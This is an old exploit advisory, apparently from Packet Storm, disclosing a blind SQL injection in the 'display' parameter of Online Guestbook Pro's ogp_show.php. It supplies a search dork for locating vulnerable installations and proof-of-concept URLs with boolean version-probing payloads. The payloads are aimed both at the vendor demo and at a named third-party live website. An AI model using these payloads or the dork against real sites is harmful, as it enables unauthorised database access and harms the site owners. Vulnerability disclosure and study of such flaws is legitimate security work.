Online Guestbook Pro SQL Injection

2009-04-17T00:00:00
ID PACKETSTORM:76780
Type packetstorm
Reporter Hussin X
Modified 2009-04-17T00:00:00

Description

                                        
                                            `Begin :D  
  
Online Guestbook Pro (display) Blind SQL Injection Vulnerability  
  
  
{____________________________________}  
Author: Hussin X  
  
Home : WwW.IQ-TY.CoM   
  
email: darkangel_g85[at]Yahoo[DoT]com  
{____________________________________}  
  
  
  
script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php  
  
DorK : Powered by Online Guestbook Pro  
  
  
  
  
Demo :  
  
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5  
  
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4  
  
BuT Results = Forbidden :D  
  
  
demo to any web  
  
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5  
  
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=4  
  
  
  
  
  
Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }  
  
end.  
  
  
`